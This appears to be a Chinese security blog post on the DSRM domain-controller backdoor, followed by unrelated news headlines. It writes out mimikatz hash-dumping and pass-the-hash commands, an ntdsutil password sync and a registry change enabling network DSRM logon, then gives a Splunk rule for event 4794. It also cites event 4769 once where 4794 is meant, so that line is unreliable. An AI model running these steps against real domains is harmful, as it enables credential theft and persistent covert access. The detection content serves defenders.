01、简介
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
(资料图片)
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator2023-01-11
安顺市人民政府关于赵彤同志不再担任职务的通知各县、自治县、区人民政府(管委会),市政府各工作部门、各直属事业单位,市属国2023-01-11
小学英语短语句子大全精选130句1 Goodmorning afternoon evening早上 下午 晚上好。2 bytheway顺便说;顺便问一下3 rightnow此刻,刚才,现在ho2023-01-11
中国青年报客户端讯(中青报·中青网记者沈杰群)1月9日,中央广播电视总台《2023年春节联欢晚会》完成第三次彩排。以节目群为单元的结构方式2023-01-10
格隆汇1月10日丨奥特维披露2022年度业绩预增公告,预计2022年度实现归属于母公司所有者的净利润为6 94亿元-7 11亿元,同比增加87 15%-91 76%;2023-01-10
中国核建:中国核建可转债转股结果暨股份变动公告2023-01-10
在非法经营的赌博机店里打工,其行为涉嫌赌博或者为赌博提供条件,情节严重的,构成开设赌场罪,依法要追究刑事责任。rn不构成非法经营罪。rn2023-01-10
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可2023-01-10
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可2023-01-10
1、产生罚息这是金钱上的损失。如果信用贷款出现逾期,贷款机构会先电话催收贷款,提醒借款人还款,同时利率还会上浮,作为每天的罚息。虽然每2023-01-10
RJ:相比字帝杜塔图姆可能不是全明星首发但他最终能拿MVP,全明星,恩比德,杜塔图姆,凯文杜兰特,德隆·威廉姆斯,理查德·杰弗森2023-01-09
3天前,感动全网的“冰墩墩”辅警拉巴在海拔4000米的高山险地中救下2023-01-09
导语:王莎莎这个名字也许大家并不耳熟,但是莫小贝大家还记得吗?这是王莎莎出演的角色之一,还有《小兵张嘎》的英子,但是王莎莎在出演了《2023-01-09
中国侨网援引马来西亚《诗华日报》报导,1月6日,一名33岁孟加拉籍厨师,因涉嫌在马来西亚武吉柏伦东精神病护理中心谋杀52岁华裔男子,被押解2023-01-09
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可2023-01-09
格隆汇1月5日丨福斯达(603173 SH)发布首次公开发行股票网上路演公告,为便于投资者了解发行人的有关情况和此次发行的相关安排,发行人和此次发2023-01-09
央视网消息:旅游景点热闹起来了,餐馆的生意也越来越红火。在深圳,不少餐厅的客流明显回升,商家们也积极招工,备战春节消费高2023-01-07
淮河能源2023年1月5日在上证E互动上发布消息称,截至2023年1月4日公司股东户数为4 88万户,较上期(2022年2023-01-06
随着消费市场回暖,实体商家对生意确定性增长的需求愈发迫切。1月5日,美团举办丽人行业峰会,与美业上下游共商复苏之策,多举措助力商家提升2023-01-06
01月05日,奥特佳被深股通减持155 71万股,最新持股量为1940 54万股,占公司A股总股本的0 60%。2023-01-06
一、整体活动情况1、活动时间:2023年1月3日00:00:00至2023年1月27日23:59:59。本次活动由多个单项活动组成,各单项活动时间、活动则如与上2023-01-06
1月5日,鹏华产业债债券最新单位净值为1 102元,累计净值为1 64元,较前一交易日上涨0 18%。历史数据显示该基金近1个月下跌0 45%,近3个月下跌2023-01-06
欢聚一堂迎新岁!湖南多彩民俗活动庆元旦2023-01-05
零摄氏度等温线指的是我国1月份平均气温为零摄氏度的地点所连成的线。因为温度、降水等方面的差异,在此线的南北,无论是自然条件、农业生产方2023-01-05
12月20日晚上,智己LS7量产版正式亮相,同时宣布开启预订,其预售价为35-50万元。这是智己汽车旗下推出的第二款车型,按照计划,这款车预计2022023-01-05
